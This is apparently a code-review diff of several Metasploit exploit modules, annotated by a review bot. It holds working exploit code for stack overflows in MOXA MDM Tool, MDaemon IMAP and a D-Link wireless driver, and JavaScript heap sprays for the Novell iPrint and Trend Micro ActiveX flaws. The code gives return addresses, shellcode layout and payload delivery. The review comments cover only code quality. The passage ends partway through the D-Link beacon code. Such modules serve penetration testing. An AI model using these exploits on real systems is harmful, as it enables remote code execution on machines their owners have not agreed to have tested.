||||
include Msf::Exploit::Remote::Seh
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'MOXA Device Manager Tool 2.1 Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a stack buffer overflow in MOXA MDM Tool 2.1.
|
||||
When sending a specially crafted MDMGw (MDM2_Gateway) response, an
|
||||
attacker may be able to execute arbitrary code.
|
||||
},
|
||||
'Author' => [ 'Ruben Santamarta', 'MC' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2010-4741'],
|
||||
[ 'OSVDB', '69027'],
|
||||
[ 'URL', 'http://www.reversemode.com/index.php?option=com_content&task=view&id=70&Itemid=' ],
|
||||
[ 'URL', 'http://www.us-cert.gov/control_systems/pdf/ICSA-10-301-01A.pdf' ]
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'thread',
|
||||
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 600,
|
||||
'BadChars' => "\x00\x0a\x0d\x20",
|
||||
'StackAdjustment' => -3500
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'MOXA MDM Tool 2.1', { 'Ret' => 0x1016bca7 } ], # UTU.dll / keeping the rop version for me...
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => 'Oct 20 2010',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptPort.new('SRVPORT', [ true, "The daemon port to listen on.", 54321 ])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def on_client_connect(client)
|
||||
|
||||
return if ((p = regenerate_payload(client)) == nil)
|
||||
|
||||
client.get_once
|
||||
|
||||
sploit = rand_text_alpha_upper(18024)
|
||||
|
||||
sploit[0, 4] = [0x29001028].pack('V')
|
||||
sploit[472, payload.encoded.length] = payload.encoded
|
||||
sploit[1072, 8] = generate_seh_record(target.ret)
|
||||
sploit[1080, 5] = Metasm::Shellcode.assemble(Metasm::Ia32.new, "call $-550").encode_string
|
||||
|
||||
client.put(sploit)
|
||||
|
||||
handler(client)
|
||||
|
||||
service.close_client(client)
|
||||
|
||||
end
|
||||
end
|
|
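Review bot: the body removed here (`-1,76 +0,0`) matches line for line the 76-line MetasploitModule version that appears in the `-1,82 +1,76` moxa_mdmtool.rb hunk further down, so this is a move onto the old module path rather than a deletion; commit it so git's rename detection sees unchanged content and history follows the file. In the body, `p = regenerate_payload(client)` is checked for nil but `p` is never used: the buffer is built from `payload.encoded`, so either use `p.encoded` or drop the assignment and keep only the nil check.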
@ -1,131 +1,83 @@
|
|||
##
|
||||
# This file is part of the Metasploit Framework and may be redistributed
|
||||
# according to the licenses defined in the Authors field below. In the
|
||||
# case of an unknown or missing license, this file defaults to the same
|
||||
# license as the core Framework (dual GPLv2 and Artistic). The latest
|
||||
# version of the Framework can always be obtained from metasploit.com.
|
||||
# $Id: mdaemon_cram_md5.rb 9583 2010-06-22 19:11:05Z todb $
|
||||
##
|
||||
|
||||
package Msf::Exploit::mdaemon_imap_cram_md5;
|
||||
use strict;
|
||||
use base 'Msf::Exploit';
|
||||
use Msf::Socket::Tcp;
|
||||
use Pex::Text;
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
my $advanced = { };
|
||||
require 'msf/core'
|
||||
|
||||
my $info = {
|
||||
'Name' => 'Mdaemon 8.0.3 IMAD CRAM-MD5 Authentication Overflow',
|
||||
'Version' => '$Revision: 1.2 $',
|
||||
'Authors' => [ 'anonymous' ],
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = GreatRanking
|
||||
|
||||
'Arch' => [ 'x86' ],
|
||||
'OS' => [ 'win32'],
|
||||
'Priv' => 1,
|
||||
include Msf::Exploit::Remote::Imap
|
||||
|
||||
'AutoOpts' => { 'EXITFUNC' => 'process' },
|
||||
'UserOpts' =>
|
||||
{
|
||||
'RHOST' => [1, 'ADDR', 'The target address'],
|
||||
'RPORT' => [1, 'PORT', 'The target port', 143],
|
||||
},
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Mdaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a buffer overflow in the CRAM-MD5
|
||||
authentication of the MDaemon IMAP service. This
|
||||
vulnerability was discovered by Muts.
|
||||
},
|
||||
'Author' => [ 'anonymous' ],
|
||||
'License' => BSD_LICENSE,
|
||||
'Version' => '$Revision: 9583 $',
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2004-1520'],
|
||||
[ 'OSVDB', '11838'],
|
||||
[ 'BID', '11675'],
|
||||
],
|
||||
'Privileged' => true,
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'process',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 500,
|
||||
'BadChars' => "\x00",
|
||||
'StackAdjustment' => -3500,
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'MDaemon IMAP 8.0.3 Windows XP SP2', { } ],
|
||||
],
|
||||
'DisclosureDate' => 'Nov 12 2004',
|
||||
'DefaultTarget' => 0))
|
||||
end
|
||||
|
||||
'Payload' =>
|
||||
{
|
||||
'Prepend' => "\x81\xc4\x1f\xff\xff\xff\x44", # make stack happy
|
||||
'Space' => 500,
|
||||
'BadChars' => "\x00",
|
||||
},
|
||||
def exploit
|
||||
connect
|
||||
|
||||
'Description' => Pex::Text::Freeform(qq{
|
||||
This module exploits a buffer overflow in the CRAM-MD5 authentication of the
|
||||
MDaemon IMAP service. This vulnerability was discovered by Muts.
|
||||
}),
|
||||
print_status("Asking for CRAM-MD5 authentication...")
|
||||
sock.put("a001 authenticate cram-md5\r\n")
|
||||
res = sock.get_once
|
||||
|
||||
'Refs' =>
|
||||
[
|
||||
['OSVDB', '11838'],
|
||||
['CVE', '2004-1520'],
|
||||
['BID', '11675'],
|
||||
],
|
||||
|
||||
'Targets' =>
|
||||
[
|
||||
['MDaemon IMAP 8.0.3 Windows XP SP2'],
|
||||
],
|
||||
print_status("Received CRAM-MD5 answer: #{res.chomp}")
|
||||
# Magic no return-address exploitation ninjaness!
|
||||
buf = 'AAAA' + payload.encoded + make_nops(258) + "\xe9\x05\xfd\xff\xff"
|
||||
req = Rex::Text.encode_base64(buf) + "\r\n"
|
||||
sock.put(req)
|
||||
res = sock.get_once
|
||||
|
||||
'Keys' => ['mdaemon'],
|
||||
};
|
||||
print_status("Received authentication reply: #{res.chomp}")
|
||||
print_status("Sending LOGOUT to close the thread and trigger an exception")
|
||||
sock.put("a002 LOGOUT\r\n")
|
||||
res = sock.get_once
|
||||
|
||||
sub new {
|
||||
my $class = shift;
|
||||
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
|
||||
print_status("Received LOGOUT reply: #{res.chomp}")
|
||||
select(nil,nil,nil,1)
|
||||
|
||||
return($self);
|
||||
}
|
||||
handler
|
||||
disconnect
|
||||
end
|
||||
|
||||
sub Exploit {
|
||||
my $self = shift;
|
||||
|
||||
my $targetHost = $self->GetVar('RHOST');
|
||||
my $targetPort = $self->GetVar('RPORT');
|
||||
my $targetIndex = $self->GetVar('TARGET');
|
||||
my $encodedPayload = $self->GetVar('EncodedPayload');
|
||||
my $shellcode = $encodedPayload->Payload;
|
||||
my $target = $self->Targets->[$targetIndex];
|
||||
|
||||
if (! $self->InitNops(128)) {
|
||||
$self->PrintLine("[*] Failed to initialize the NOP module.");
|
||||
return;
|
||||
}
|
||||
|
||||
my $sock = Msf::Socket::Tcp->new(
|
||||
'PeerAddr' => $targetHost,
|
||||
'PeerPort' => $targetPort,
|
||||
);
|
||||
|
||||
if($sock->IsError) {
|
||||
$self->PrintLine('Error creating socket: ' . $sock->GetError);
|
||||
return;
|
||||
}
|
||||
|
||||
my $resp = $sock->Recv(-1);
|
||||
chomp($resp);
|
||||
$self->PrintLine('[*] Got Banner: ' . $resp);
|
||||
|
||||
my $req = "a001 authenticate cram-md5\r\n";
|
||||
$sock->Send($req);
|
||||
$self->PrintLine('[*] CRAM-MD5 authentication method asked');
|
||||
|
||||
$resp = $sock->Recv(-1);
|
||||
chomp($resp);
|
||||
$self->PrintLine('[*] Got CRAM-MD5 answer: ' . $resp);
|
||||
|
||||
# Magic no return-address exploitation ninjaness!
|
||||
$req = "AAAA" . $shellcode . $self->MakeNops(258) . "\xe9\x05\xfd\xff\xff";
|
||||
$req = Pex::Text::Base64Encode($req, '') . "\r\n";
|
||||
$sock->Send($req);
|
||||
$self->PrintLine('[*] CRAM-MD5 authentication with shellcode sent');
|
||||
|
||||
$resp = $sock->Recv(-1);
|
||||
chomp($resp);
|
||||
$self->PrintLine('[*] Got authentication reply: ' . $resp);
|
||||
|
||||
$req = "a002 LOGOUT\r\n";
|
||||
$sock->Send($req);
|
||||
$self->PrintLine('[*] Send LOGOUT to close the thread and trigger an exception');
|
||||
|
||||
$resp = $sock->Recv(-1);
|
||||
chomp($resp);
|
||||
$self->PrintLine('[*] Got LOGOUT reply: ' . $resp);
|
||||
|
||||
$self->PrintLine("[*] Overflow request sent, sleeping for one second");
|
||||
select(undef, undef, undef, 1);
|
||||
|
||||
$self->Handler($sock);
|
||||
return;
|
||||
}
|
||||
|
||||
1;
|
||||
|
||||
# milw0rm.com [2005-08-12]
|
||||
end
|
||||
|
|
|
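Review bot: in the Ruby version, each `res = sock.get_once` can return nil when the server closes the connection or the read times out, and the `res.chomp` inside the following print_status then raises NoMethodError instead of reporting the failure; use `res.to_s.chomp` or bail out with a message when res is nil. The Perl code being replaced carried 'Prepend' => "\x81\xc4\x1f\xff\xff\xff\x44" (add esp, -0xe1 followed by inc esp, commented "make stack happy"); the Ruby version substitutes 'StackAdjustment' => -3500, a much larger adjustment, and the reason it is safe should be carried over as a comment. The Perl title says "IMAD" and the Ruby title "IMAPD"; the corrected spelling is the one to keep.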
@ -1,3 +1,14 @@
|
|||
##
|
||||
# $Id: novelliprint_callbackurl.rb 10429 2010-09-21 18:46:29Z jduck $
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
##
|
||||
# novelliprint_callbackurl.rb
|
||||
#
|
||||
|
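Review bot: the added header uses an svn `$Id: ... $` keyword, and the 'Version' => '$Revision: 10429 $' value later in this file is of the same kind; git does not expand $Revision$, so these values are frozen at the numbers pasted here and will drift from the file's real history. Prefer dropping the keywords and relying on git history.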
@ -39,13 +50,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Name' => 'Novell iPrint Client ActiveX Control call-back-url Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a stack-based buffer overflow in Novell iPrint Client 5.42.
|
||||
When sending an overly long string to the 'call-back-url' parameter in an
|
||||
op-client-interface-version action of ienipp.ocx an attacker may be able to
|
||||
execute arbitrary code.
|
||||
When sending an overly long string to the 'call-back-url' parameter in an
|
||||
op-client-interface-version action of ienipp.ocx an attacker may be able to
|
||||
execute arbitrary code.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [ 'Trancer <mtrancer[at]gmail.com' ],
|
||||
'Version' => '$Revision:$',
|
||||
'Version' => '$Revision: 10429 $',
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2010-1527' ],
|
||||
|
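Review bot: 'Author' => [ 'Trancer <mtrancer[at]gmail.com' ] is missing the closing '>' of the address. The Description lines appear twice with identical text, so apart from the 'Version' value this hunk is an indentation-only change; whitespace reflows are easier to review in their own commit.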
@ -85,15 +96,15 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
# Encode the shellcode.
|
||||
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
|
||||
|
||||
|
||||
# Setup exploit buffers
|
||||
nops = Rex::Text.to_unescape([target.ret].pack('V'))
|
||||
ret = [target.ret].pack('V')
|
||||
ret = ret * 250
|
||||
blocksize = 0x40000
|
||||
fillto = 500
|
||||
fillto = 500
|
||||
offset = target['Offset']
|
||||
|
||||
|
||||
# ActiveX parameters
|
||||
clsid = "36723F97-7AA0-11D4-8919-FF2D71D0D32C"
|
||||
|
||||
|
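Review bot: `nops = Rex::Text.to_unescape([target.ret].pack('V'))` fills the spray block with copies of the return address rather than with NOPs, while the name `nops` and the `j_nops` JavaScript variable suggest a NOP sled; name it for what it holds and comment the choice. `fillto = 500` is repeated unchanged, so the remainder of the hunk is whitespace only.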
@ -109,7 +120,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
j_memory = rand_text_alpha(rand(100) + 1)
|
||||
j_counter = rand_text_alpha(rand(30) + 2)
|
||||
|
||||
html = %Q|<html>
|
||||
html = %Q|<html>
|
||||
<script>
|
||||
var #{j_shellcode} = unescape('#{shellcode}');
|
||||
var #{j_nops} = unescape('#{nops}');
|
||||
|
@ -120,13 +131,13 @@ var #{j_fillblock} = #{j_nops}.substring(0,#{j_slackspace});
|
|||
var #{j_block} = #{j_nops}.substring(0,#{j_nops}.length - #{j_slackspace});
|
||||
while (#{j_block}.length + #{j_slackspace} < #{blocksize}) #{j_block} = #{j_block} + #{j_block} + #{j_fillblock};
|
||||
var #{j_memory} = new Array();
|
||||
for (#{j_counter} = 0; #{j_counter} < #{fillto}; #{j_counter}++) {
|
||||
for (#{j_counter} = 0; #{j_counter} < #{fillto}; #{j_counter}++) {
|
||||
#{j_memory}[#{j_counter}] = #{j_block} + #{j_shellcode};
|
||||
}
|
||||
}
|
||||
</script>
|
||||
<object classid='clsid:#{clsid}' id='#{ienipp}'>
|
||||
<param name='operation' value='op-client-interface-version' />
|
||||
<param name='result-type' value='url' />
|
||||
<param name='operation' value='op-client-interface-version' />
|
||||
<param name='result-type' value='url' />
|
||||
<param name='call-back-url' value='#{ret}' />
|
||||
</object>
|
||||
</html>|
|
||||
|
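Review bot: `<param name='call-back-url' value='#{ret}' />` interpolates the raw `ret` buffer (`[target.ret].pack('V')` repeated 250 times, from the @ -85 hunk) straight into a single-quoted HTML attribute with no escaping, so the module silently depends on none of those four bytes being a quote, '<' or '&'; record that constraint in a comment next to the target definition rather than leaving it implicit. The duplicated `for`, `}` and `<param>` lines are whitespace-only changes.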
@ -140,4 +151,4 @@ for (#{j_counter} = 0; #{j_counter} < #{fillto}; #{j_counter}++) {
|
|||
handler(cli)
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
|
|
|
@ -1,3 +1,14 @@
|
|||
##
|
||||
# $Id: trendmicro_extsetowner.rb 10538 2010-10-04 04:26:09Z jduck $
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
##
|
||||
# trendmicro_extsetowner.rb
|
||||
#
|
||||
|
@ -37,14 +48,14 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
super(update_info(info,
|
||||
'Name' => 'Trend Micro Internet Security Pro 2010 ActiveX extSetOwner() Remote Code Execution',
|
||||
'Description' => %q{
|
||||
This module exploits a remote code execution vulnerability in Trend Micro
|
||||
Internet Security Pro 2010 ActiveX.
|
||||
When sending an invalid pointer to the extSetOwner() function of UfPBCtrl.dll
|
||||
an attacker may be able to execute arbitrary code.
|
||||
This module exploits a remote code execution vulnerability in Trend Micro
|
||||
Internet Security Pro 2010 ActiveX.
|
||||
When sending an invalid pointer to the extSetOwner() function of UfPBCtrl.dll
|
||||
an attacker may be able to execute arbitrary code.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [ 'Trancer <mtrancer[at]gmail.com' ],
|
||||
'Version' => '$Revision:$',
|
||||
'Version' => '$Revision: 10538 $',
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2010-3189' ],
|
||||
|
@ -64,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Windows XP SP0-SP2 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x00C750A1 } ]
|
||||
[ 'Windows XP SP0-SP2 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x00C750A1 } ] #??
|
||||
],
|
||||
'DisclosureDate' => 'Aug 25 2010',
|
||||
'DefaultTarget' => 0))
|
||||
|
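Review bot: the `#??` appended to `{ 'Ret' => 0x00C750A1 }` documents nothing; a target entry should record what the address is (the spray landing address that the JavaScript fills, or the module and offset it points into) and why it was chosen, or else say explicitly that it is unverified so users of the module know the target is a guess. The label 'Windows XP SP0-SP2 / Windows Vista / IE 6.0 SP0-SP2 / IE 7' is the only other hint in the entry.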
@ -84,13 +95,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
# Encode the shellcode.
|
||||
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
|
||||
|
||||
|
||||
# Setup exploit buffers
|
||||
nops = Rex::Text.to_unescape(make_nops(4))
|
||||
ret = Rex::Text.to_unescape([target.ret].pack('V'))
|
||||
blocksize = 0x40000
|
||||
fillto = 500
|
||||
|
||||
fillto = 500
|
||||
|
||||
# ActiveX parameters
|
||||
clsid = "15DBC3F9-9F0A-472E-8061-043D9CEC52F0"
|
||||
|
||||
|
@ -118,9 +129,9 @@ var #{j_fillblock} = #{j_nops}.substring(0,#{j_slackspace});
|
|||
var #{j_block} = #{j_nops}.substring(0,#{j_nops}.length - #{j_slackspace});
|
||||
while (#{j_block}.length + #{j_slackspace} < #{blocksize}) #{j_block} = #{j_block} + #{j_block} + #{j_fillblock};
|
||||
var #{j_memory} = new Array();
|
||||
for (#{j_counter} = 0; #{j_counter} < #{fillto}; #{j_counter}++) {
|
||||
for (#{j_counter} = 0; #{j_counter} < #{fillto}; #{j_counter}++) {
|
||||
#{j_memory}[#{j_counter}] = #{j_block} + #{j_shellcode};
|
||||
}
|
||||
}
|
||||
#{ufpbctrl}.extSetOwner(unescape('#{ret}'));
|
||||
</script>
|
||||
</html>|
|
||||
|
@ -133,4 +144,4 @@ for (#{j_counter} = 0; #{j_counter} < #{fillto}; #{j_counter}++) {
|
|||
# Handle the payload
|
||||
handler(cli)
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
|
@ -1,82 +1,76 @@
|
|||
##
|
||||
# $Id: moxa_mdmtool.rb 11039 2010-11-14 19:03:24Z jduck $
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = GreatRanking
|
||||
|
||||
Rank = GreatRanking
|
||||
include Msf::Exploit::Remote::TcpServer
|
||||
include Msf::Exploit::Remote::Seh
|
||||
|
||||
include Msf::Exploit::Remote::TcpServer
|
||||
include Msf::Exploit::Remote::Seh
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'MOXA Device Manager Tool 2.1 Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a stack buffer overflow in MOXA MDM Tool 2.1.
|
||||
When sending a specially crafted MDMGw (MDM2_Gateway) response, an
|
||||
attacker may be able to execute arbitrary code.
|
||||
},
|
||||
'Author' => [ 'Ruben Santamarta', 'MC' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2010-4741'],
|
||||
[ 'OSVDB', '69027'],
|
||||
[ 'URL', 'http://www.reversemode.com/index.php?option=com_content&task=view&id=70&Itemid=' ],
|
||||
[ 'URL', 'http://www.us-cert.gov/control_systems/pdf/ICSA-10-301-01A.pdf' ]
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'thread',
|
||||
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 600,
|
||||
'BadChars' => "\x00\x0a\x0d\x20",
|
||||
'StackAdjustment' => -3500
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'MOXA MDM Tool 2.1', { 'Ret' => 0x1016bca7 } ], # UTU.dll / keeping the rop version for me...
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => 'Oct 20 2010',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'MOXA Device Manager Tool 2.1 Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a stack buffer overflow in MOXA MDM Tool 2.1.
|
||||
When sending a specially crafted MDMGw (MDM2_Gateway) response, an
|
||||
attacker may be able to execute arbitrary code.
|
||||
},
|
||||
'Author' => [ 'Ruben Santamarta', 'MC' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision: 11039 $',
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '69027'],
|
||||
[ 'URL', 'http://www.reversemode.com/index.php?option=com_content&task=view&id=70&Itemid=' ],
|
||||
[ 'URL', 'http://www.us-cert.gov/control_systems/pdf/ICS-Alert-10-293-02.pdf' ],
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'thread',
|
||||
'InitialAutoRunScript' => 'migrate -f',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 600,
|
||||
'BadChars' => "\x00\x0a\x0d\x20",
|
||||
'StackAdjustment' => -3500,
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'MOXA MDM Tool 2.1', { 'Ret' => 0x1016bca7 } ], # UTU.dll / keeping the rop version for me...
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => 'Oct 20 2010',
|
||||
'DefaultTarget' => 0))
|
||||
register_options(
|
||||
[
|
||||
OptPort.new('SRVPORT', [ true, "The daemon port to listen on.", 54321 ])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptPort.new('SRVPORT', [ true, "The daemon port to listen on.", 54321 ])
|
||||
], self.class)
|
||||
end
|
||||
def on_client_connect(client)
|
||||
|
||||
def on_client_connect(client)
|
||||
return if ((p = regenerate_payload(client)) == nil)
|
||||
|
||||
return if ((p = regenerate_payload(client)) == nil)
|
||||
client.get_once
|
||||
|
||||
client.get_once
|
||||
sploit = rand_text_alpha_upper(18024)
|
||||
|
||||
sploit = rand_text_alpha_upper(18024)
|
||||
sploit[0, 4] = [0x29001028].pack('V')
|
||||
sploit[472, payload.encoded.length] = payload.encoded
|
||||
sploit[1072, 8] = generate_seh_record(target.ret)
|
||||
sploit[1080, 5] = Metasm::Shellcode.assemble(Metasm::Ia32.new, "call $-550").encode_string
|
||||
|
||||
sploit[0, 4] = [0x29001028].pack('V')
|
||||
sploit[472, payload.encoded.length] = payload.encoded
|
||||
sploit[1072, 8] = generate_seh_record(target.ret)
|
||||
sploit[1080, 5] = Metasm::Shellcode.assemble(Metasm::Ia32.new, "call $-550").encode_string
|
||||
client.put(sploit)
|
||||
|
||||
client.put(sploit)
|
||||
handler(client)
|
||||
|
||||
handler(client)
|
||||
service.close_client(client)
|
||||
|
||||
service.close_client(client)
|
||||
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
|
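Review bot: two copies of the module body are present in this hunk and they differ in substance, not only in header style: one carries the `[ 'CVE', '2010-4741']` reference, the ICSA-10-301-01A.pdf advisory URL and 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'; the other has no CVE line, the older ICS-Alert-10-293-02.pdf URL, 'InitialAutoRunScript' => 'migrate -f' and a 'Version' => '$Revision: 11039 $' keyword. The copy with the CVE id and the post module is the one to keep: 'migrate -f' invokes a meterpreter script of the kind Metasploit deprecated in favour of post modules, and the CVE is the identifier other tooling matches on. Since the same 76-line body is removed verbatim in the `-1,76 +0,0` hunk earlier in this diff, this is effectively a rename onto moxa_mdmtool.rb and should be committed so rename detection can see it.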
@ -1,202 +0,0 @@
|
|||
##
|
||||
# $Id: dlink_wifi_rates.rb 9670 2010-07-03 03:19:07Z jduck $
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = LowRanking
|
||||
|
||||
include Msf::Exploit::Lorcon2
|
||||
include Msf::Exploit::KernelMode
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'D-Link DWL-G132 Wireless Driver Beacon Rates Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a stack buffer overflow in the A5AGU.SYS driver provided
|
||||
with the D-Link DWL-G132 USB wireless adapter. This stack buffer overflow
|
||||
allows remote code execution in kernel mode. The stack buffer overflow is triggered
|
||||
when a 802.11 Beacon frame is received that contains a long Rates information
|
||||
element. This exploit was tested with version 1.0.1.41 of the
|
||||
A5AGU.SYS driver and a D-Link DWL-G132 USB adapter (HW: A2, FW: 1.02). Newer
|
||||
versions of the A5AGU.SYS driver are provided with the D-Link WUA-2340
|
||||
adapter and appear to resolve this flaw, but D-Link does not offer an updated
|
||||
driver for the DWL-G132. Since this vulnerability is exploited via beacon frames,
all cards within range of the attack will be affected. The tested adapter used
a MAC address in the range of 00:11:95:f2:XX:XX.

Vulnerable clients will need to have their card in a non-associated state
for this exploit to work. The easiest way to reproduce this bug is by starting
the exploit and then accessing the Windows wireless network browser and
forcing it to refresh.

D-Link was NOT contacted about this flaw. A search of the SecurityFocus
database indicates that D-Link has not provided an official patch or
solution for any of the seven flaws listed at the time of writing:
(BIDs 13679, 16621, 16690, 18168, 18299, 19006, and 20689).

As of November 17th, 2006, D-Link has fixed the flaw it the latest version of the
DWL-G132 driver (v1.21).

This module depends on the Lorcon2 library and only works on the Linux platform
with a supported wireless card. Please see the Ruby Lorcon2 documentation
(external/ruby-lorcon/README) for more information.
},
'Author' =>
[
'hdm', # discovery, exploit dev
'skape', # windows kernel ninjitsu
'Johnny Cache <johnnycsh [at] 802.11mercenary.net>' # making all of this possible
],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9670 $',
'References' =>
[
['CVE', '2006-6055'],
['OSVDB', '30296'],
['URL', 'http://projects.info-pull.com/mokb/MOKB-13-11-2006.html'],
['URL', 'ftp://ftp.dlink.com/Wireless/dwlg132/Driver/DWLG132_driver_102.zip'],
],
'Privileged' => true,

'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},

'Payload' =>
{
# Its a beautiful day in the neighborhood...
'Space' => 1000
},
'Platform' => 'win',
'Targets' =>
[
# Windows XP SP2 with the latest updates
# 5.1.2600.2622 (xpsp_sp2_gdr.050301-1519)
[ 'Windows XP SP2 (5.1.2600.2122), A5AGU.sys 1.0.1.41',
{
'Ret' => 0x8066662c, # jmp edi
'Platform' => 'win',
'Payload' =>
{
'ExtendedOptions' =>
{
'Stager' => 'sud_syscall_hook',
'PrependUser' => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500
'Recovery' => 'idlethread_restart',
'KiIdleLoopAddress' => 0x804dbb27,
}
}
}
],

# Windows XP SP2 install media, no patches
# 5.1.2600.2180 (xpsp_sp2_rtm_040803-2158)
[ 'Windows XP SP2 (5.1.2600.2180), A5AGU.sys 1.0.1.41',
{
'Ret' => 0x804f16eb, # jmp edi
'Platform' => 'win',
'Payload' =>
{
'ExtendedOptions' =>
{
'Stager' => 'sud_syscall_hook',
'PrependUser' => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500
'Recovery' => 'idlethread_restart',
'KiIdleLoopAddress' => 0x804dc0c7,
}
}
}
]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Nov 13 2006'))

register_options(
[
OptString.new('ADDR_DST', [ true, "The MAC address to send this to",'FF:FF:FF:FF:FF:FF']),
OptInt.new('RUNTIME', [ true, "The number of seconds to run the attack", 60])
], self.class)
end

def exploit
open_wifi

stime = Time.now.to_i
rtime = datastore['RUNTIME'].to_i
count = 0

print_status("Sending exploit beacons for #{datastore['RUNTIME']} seconds...")
while (stime + rtime > Time.now.to_i)
wifi.write(create_beacon)
select(nil, nil, nil, 0.10) if (count % 100 == 0)

count += 1

# Exit if we get a session
break if session_created?
end

print_status("Completed sending beacons.")
end


#
# The following research was provided by Gil Dabah of ZERT
#
# The long rates field bug can be triggered three different ways (at least):
# 1) Send a single rates IE with valid rates up front and long data
# 2) Send a single rates IE field with valid rates, follow with IE type 0x32 with long data
# 3) Send two IE rates fields, with the second one containing the long data (this exploit)
#

def create_beacon

ssid = rand_text_alphanumeric(6)
